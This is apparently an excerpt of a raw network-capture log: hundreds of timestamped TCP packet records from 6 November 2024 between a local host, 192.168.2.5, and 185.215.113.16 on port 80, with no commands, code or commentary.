                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141787052 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141798019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141801119 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141809940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141827106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141827106 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141841888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141850948 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141851902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141869068 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141906977 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141922951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141932964 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141943932 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141944885 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141959906 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141964912 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141973019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141984940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141999006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142000914 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142013073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142014980 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142025948 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142036915 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142047882 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142054081 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142066956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142085075 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142088890 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142088890 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142102003 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142117977 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142128944 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142139912 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142149925 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142152071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142163038 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142167091 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142174959 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142187119 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142189980 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142199039 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142211914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142227888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142229080 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142229080 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142241001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142251015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142266035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142271996 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142280102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142283916 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142293930 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142304897 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142317057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142330885 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142334938 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142349958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142358065 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142363071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142369986 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142374992 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142389059 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142399073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142400980 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142411947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142427921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142427921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142441034 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142451048 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142460108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142477036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142484903 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142493963 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142509937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142518044 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142520905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142534018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142544985 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142546892 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142556906 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142560959 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142570019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142582893 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142596006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142601967 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142607927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142618895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142637014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142637968 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142644882 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142649889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142661095 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142674923 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142679930 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142698050 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142704964 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142709970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142725945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142734051 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142738104 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142750025 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142760992 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142764091 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142774105 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142781973 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142786026 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142797947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142807007 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142827034 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142834902 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142838955 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142851114 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142863035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142868042 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142878056 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142889023 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142899036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142901897 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142910957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142923117 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142925024 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142940998 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142946959 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142954111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142971039 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142973900 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.142987013 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143001080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143007994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143012047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143023014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143034935 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143035889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143049002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143059969 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143062115 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143070936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143084049 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143086910 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143095016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143107891 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143110037 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143122911 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143130064 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143140078 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143151999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143166065 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143167973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143184900 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143188000 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143198013 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143208981 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143217087 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143220901 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143233061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143244982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143246889 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143256903 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143269062 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143273115 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143280983 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143294096 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143302917 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143306017 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143321037 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143337011 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143348932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143357038 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143359900 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143372059 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143383980 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143388987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143404961 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143408060 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143416882 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143429041 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143439054 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143440008 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143455982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143459082 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143470049 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143491030 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143548965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143559933 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143574953 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143585920 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143601894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143601894 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143614054 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143625021 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143627882 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143635988 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143647909 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143656015 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143656015 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143665075 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143676996 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143691063 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143696070 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143702984 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143707991 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143714905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143726110 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143740892 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143750906 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143755913 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143764019 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143769026 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143783092 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143791914 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143796921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143810987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143819094 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143857002 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143913031 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143924952 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143935919 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143949032 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143959999 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143964052 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143975973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143989086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.143995047 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144001961 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144007921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144015074 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144016027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144026995 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144061089 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144078016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144081116 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144084930 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144103050 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144114971 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144120932 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144125938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144143105 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144155979 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144160986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144174099 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144184113 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144187927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144196987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144215107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144223928 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144228935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144234896 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144239902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144244909 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144256115 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144265890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144275904 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144277096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144294977 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144295931 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144309044 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144310951 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144320965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144332886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144339085 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144345045 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144356966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144365072 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144370079 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144382954 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144392014 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.144427061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167367935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167408943 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167418957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167428970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167445898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167454004 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167458057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167469025 CET8049719185.215.113.16192.168.2.5
